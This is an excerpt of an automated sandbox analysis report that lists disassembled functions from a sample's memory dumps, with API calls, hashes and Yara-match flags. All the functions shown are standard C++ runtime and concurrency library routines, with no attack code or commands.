                                                  • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                  • Instruction ID: b0d532a26f63f6046bced7af3b1e02d5ba17ec3ebf316f442b0a79b2244c41dd
                                                  • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                  • Instruction Fuzzy Hash: 3F01F232700120ABCF16AE569811AFF779AAF90354F41001BFC11A7282CA34FD2192A8
                                                  Function 030363B5 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 030363CF
                                                  • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 030363E3
                                                  • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 030363FB
                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 03036413
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                  • String ID:
                                                  • API String ID: 78362717-0
                                                  • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                  • Instruction ID: 9130663f191db88f45980ba5b77850ec359aa621d86125f6982e028057c9a63c
                                                  • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                  • Instruction Fuzzy Hash: 7E01F93AA01628BBCF15EE55C880AEFBB9DEFC6350F040455FD11AF281DA72ED1186E1
                                                  Function 03032BA2 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::location::_Assign.LIBCMT ref: 03032BD1
                                                  • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 03032BEF
                                                    • Part of subcall function 030286A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 030286C8
                                                    • Part of subcall function 030286A7: Hash.LIBCMT ref: 03028708
                                                  • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 03032BF8
                                                  • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 03032C18
                                                    • Part of subcall function 0302F6FF: Hash.LIBCMT ref: 0302F711
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                  • String ID:
                                                  • API String ID: 2250070497-0
                                                  • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                  • Instruction ID: 6924246e154176c7d557c06a4c05a4fdd9e81a13c6b0c0765a25dbdd463439fc
                                                  • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                  • Instruction Fuzzy Hash: 99117C7A501704AFC715DF65C8819DAFBBCAF59320B008A5EE5568B151DB70F514CB50
                                                  Function 03032BB1 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::location::_Assign.LIBCMT ref: 03032BD1
                                                  • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 03032BEF
                                                    • Part of subcall function 030286A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 030286C8
                                                    • Part of subcall function 030286A7: Hash.LIBCMT ref: 03028708
                                                  • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 03032BF8
                                                  • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 03032C18
                                                    • Part of subcall function 0302F6FF: Hash.LIBCMT ref: 0302F711
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                  • String ID:
                                                  • API String ID: 2250070497-0
                                                  • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                  • Instruction ID: 7e44fa2241182ef0883a19f563b0f1e465e32ea0608e2f63abc01db4d0a8cf14
                                                  • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                  • Instruction Fuzzy Hash: B001177A501704ABC715EFA9C881DDAF7ECEF99320B008A1EE5569B150DB70F554CB60
                                                  Function 00405944 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 0040594B
                                                    • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405996
                                                  • __Getcoll.LIBCPMT ref: 004059A5
                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 004059B5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                  • String ID:
                                                  • API String ID: 1836011271-0
                                                  • Opcode ID: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                  • Instruction ID: 9fd44fd2a3ed9f30d206a08b807669c32d498cc680062da3e3aec36702d876a7
                                                  • Opcode Fuzzy Hash: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                  • Instruction Fuzzy Hash: 710135B1920209DFDB10EFA5C48279DBBB0FF00314F00813EE445AB281DB789984CF99
                                                  Function 00404E88 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 00404E8F
                                                    • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EDA
                                                  • __Getcoll.LIBCPMT ref: 00404EE9
                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EF9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                  • String ID:
                                                  • API String ID: 1836011271-0
                                                  • Opcode ID: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                  • Instruction ID: 32d9f0e851cf819fcbf451bbe4f834ae4b9dc531d1d0ebefa622e2c81c742f75
                                                  • Opcode Fuzzy Hash: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                  • Instruction Fuzzy Hash: 9F015771910209DFEB10EFA5C48179DB7B0BF80314F00813EE445AB281DB789984CB99
                                                  Function 030150EF Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 030150F6
                                                    • Part of subcall function 0301BDD3: __EH_prolog3_GS.LIBCMT ref: 0301BDDA
                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 03015141
                                                  • __Getcoll.LIBCPMT ref: 03015150
                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 03015160
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                  • String ID:
                                                  • API String ID: 1836011271-0
                                                  • Opcode ID: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                  • Instruction ID: dd355e7d24204b29dae2c31598d198d5fb2db017a56471dc1b5aeea1570987f3
                                                  • Opcode Fuzzy Hash: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                  • Instruction Fuzzy Hash: 96019A75C02308DFEB44EFA8C880BDDBBB0BF84310F408429D444AF280DBB89694CB91
                                                  Function 03015BAB Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog3_GS.LIBCMT ref: 03015BB2
                                                    • Part of subcall function 0301BDD3: __EH_prolog3_GS.LIBCMT ref: 0301BDDA
                                                  • std::_Locinfo::_Locinfo.LIBCPMT ref: 03015BFD
                                                  • __Getcoll.LIBCPMT ref: 03015C0C
                                                  • std::_Locinfo::~_Locinfo.LIBCPMT ref: 03015C1C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                  • String ID:
                                                  • API String ID: 1836011271-0
                                                  • Opcode ID: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                  • Instruction ID: 048ea5beccc372ff57db9ed53d3349d1ae49449eb11ef5cbc5e960e72a76ef1e
                                                  • Opcode Fuzzy Hash: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                  • Instruction Fuzzy Hash: 25018875842308DFEB04EFA4C880BDDBBB0BF88310F00842AD444AF280CBB89594CB90
                                                  Function 0041BEF7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF49
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Compare_exchange_acquire_4std::_
                                                  • String ID:
                                                  • API String ID: 3973403980-0
                                                  • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                  • Instruction ID: 72732f5efe9b63b971529a3f0cd962c81f2cd17cb7f3a1b82d9d198b59e5c030
                                                  • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                  • Instruction Fuzzy Hash: FB01F63608414DBBCF129E64DC428EE3B26EB08354B148416FD18C4232C336CAB2AF8E
                                                  Function 0302C15E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0302C190
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0302C1A0
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0302C1B0
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0302C1C4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Compare_exchange_acquire_4std::_
                                                  • String ID:
                                                  • API String ID: 3973403980-0
                                                  • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                  • Instruction ID: bf3687618913fb660930e8b861fc073e2ae402c074699cfca63c8cb041fbdf2b
                                                  • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                  • Instruction Fuzzy Hash: 0301313B006129BBEF61DF58DC029AE3F66BF46250F188412F91898430D332C770EB82
                                                  Function 0040D244 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110FB
                                                    • Part of subcall function 0041096D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041098F
                                                    • Part of subcall function 0041096D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109B0
                                                  • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041110E
                                                  • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041111A
                                                  • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411123
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                  • String ID:
                                                  • API String ID: 4284812201-0
                                                  • Opcode ID: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                  • Instruction ID: 32ef31896b2cb6abdcbb34161c10e74fd4bf83775755d0cce9f66a209d269357
                                                  • Opcode Fuzzy Hash: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                  • Instruction Fuzzy Hash: 5EF02470A8020467DF24BBA648525EE72954F84328F14003FB7126B7D2CEBC4DC2929C
                                                  Function 0041352C Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413545
                                                    • Part of subcall function 004128CF: ___crtGetTimeFormatEx.LIBCMT ref: 004128E5
                                                    • Part of subcall function 004128CF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00412904
                                                  • GetLastError.KERNEL32 ref: 00413561
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413577
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00413585
                                                    • Part of subcall function 004126A5: SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                  • String ID:
                                                  • API String ID: 1674182817-0
                                                  • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                  • Instruction ID: d4d0e34155d1b65ea1fa919a817b0ae51ac78690af07c02d22dcd9fb344bc12c
                                                  • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                  • Instruction Fuzzy Hash: 80F0E2B1A002193AE720BA765D07FFB369C9B00B90F90081BB905E6082EDDCD95042BC
                                                  Function 03023793 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 030237AC
                                                    • Part of subcall function 03022B36: ___crtGetTimeFormatEx.LIBCMT ref: 03022B4C
                                                    • Part of subcall function 03022B36: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 03022B6B
                                                  • GetLastError.KERNEL32 ref: 030237C8
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030237DE
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 030237EC
                                                    • Part of subcall function 0302290C: SetThreadPriority.KERNEL32(?,?), ref: 03022918
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                  • String ID:
                                                  • API String ID: 1674182817-0
                                                  • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                  • Instruction ID: 1ff749c7dcaa953faf4b21add90ea85feaa4bcc8fa0b01b7b6c67f403237aaeb
                                                  • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                  • Instruction Fuzzy Hash: 7EF082B66413293AE760F7B54C06FFB3A9C9B41651F540C5AB905EA080E998E40487A8
                                                  Function 0301D4AB Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 03021362
                                                    • Part of subcall function 03020BD4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 03020BF6
                                                    • Part of subcall function 03020BD4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 03020C17
                                                  • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 03021375
                                                  • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 03021381
                                                  • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0302138A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                  • String ID:
                                                  • API String ID: 4284812201-0
                                                  • Opcode ID: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                  • Instruction ID: 4479d1828a1028422b87ac7a7a096cc5a9f8d9517ef999f92eae3eb3854083f2
                                                  • Opcode Fuzzy Hash: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                  • Instruction Fuzzy Hash: A2F0BE34687728A7AF68FAA448509FE6A9B5FD0220F080269A512AF7C0CE758D05939C
                                                  Function 0302D094 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0302D0A8
                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0302D0CC
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0302D0DF
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0302D0ED
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                  • String ID:
                                                  • API String ID: 3657713681-0
                                                  • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                  • Instruction ID: 4e8b8ea9ed7975a01fb06a790957e7ec499de39c7b75539af34407d84ed4eaa4
                                                  • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                  • Instruction Fuzzy Hash: C9F0593990232463C724EB54D890DEDFBB98ED1B14324896BD8161B191DB35AD0AC361
                                                  Function 00412611 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00412628
                                                  • GetLastError.KERNEL32(?,?,?,?,004185E9,?,?,?,?,00000000,?,00000000), ref: 00412637
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041264D
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041265B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                  • String ID:
                                                  • API String ID: 3803302727-0
                                                  • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                  • Instruction ID: 0dfe4b91b17fca29e91fbe1ee06f4a4a2df34707d6a261af2a3e5670f24271a8
                                                  • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                  • Instruction Fuzzy Hash: 34F0A07460010EBBCF10EFA5DE45EEF37686B00705F600656B514E20E1DA78DA149768
                                                  Function 03015A8C Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • std::_Cnd_initX.LIBCPMT ref: 03015AA8
                                                  • __Cnd_signal.LIBCPMT ref: 03015AB4
                                                  • std::_Cnd_initX.LIBCPMT ref: 03015AC9
                                                  • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 03015AD0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                  • String ID:
                                                  • API String ID: 2059591211-0
                                                  • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                  • Instruction ID: 7533bc5073aafe963ca00c8ff770ad88425b3d8f981881a3aa2abad82812434c
                                                  • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                  • Instruction Fuzzy Hash: 70F0A03A002701ABEB35FB20C8157EAB7A0AFC0324F144519D1965E9A0CFBAA8659755
                                                  Function 03022878 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 0302288F
                                                  • GetLastError.KERNEL32(?,?,?,?,03028850,?,?,?,?,00000000,?,00000000), ref: 0302289E
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030228B4
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 030228C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                  • String ID:
                                                  • API String ID: 3803302727-0
                                                  • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                  • Instruction ID: 4c05d851f7f4d654fa459e80c87eed69619f2528ac9546fa56bc798b3deb1678
                                                  • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                  • Instruction Fuzzy Hash: 88F0A03550121ABBCF00EFE4CD44EEF3BACAB00601F200A55FA14E60A0DB34D60497A4
                                                  Function 00412336 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___crtCreateEventExW.LIBCPMT ref: 0041234C
                                                  • GetLastError.KERNEL32(?,?,?,?,?,00410B59), ref: 0041235A
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412370
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041237E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                  • String ID:
                                                  • API String ID: 200240550-0
                                                  • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                  • Instruction ID: f5537a877189a90aa28975f9b1b11099a3717870695f97e2c6136de35ce4b3b1
                                                  • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                  • Instruction Fuzzy Hash: ADE0D871A0021E29E720B7768D07FBF369C6B00B45F54086BBD14E11C3FDACD61041AC
                                                  Function 0302259D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • ___crtCreateEventExW.LIBCPMT ref: 030225B3
                                                  • GetLastError.KERNEL32(?,?,?,?,?,03020DC0), ref: 030225C1
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030225D7
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 030225E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                  • String ID:
                                                  • API String ID: 200240550-0
                                                  • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                  • Instruction ID: 2909da87015c845d0e9b7e63286a735c09fe7551c470b30ef6844bad19279b2c
                                                  • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                  • Instruction Fuzzy Hash: DEE0D8656013292AE750F7B44C02FBF3ADC9B00A41F544C55F914E90C1FDA4D50442A4
